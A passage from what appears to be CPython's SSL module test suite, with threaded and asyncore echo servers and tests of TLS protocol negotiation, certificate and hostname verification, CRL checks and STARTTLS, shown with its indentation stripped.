elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError until the handshake is done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(
ssl.SSLError,
'alert unknown ca|EOF occurred'
):
                # TLS 1.3 performs the client cert exchange after the handshake
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
        in the client when attempting the handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
        # Will negotiate the highest TLS version supported by both sides
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
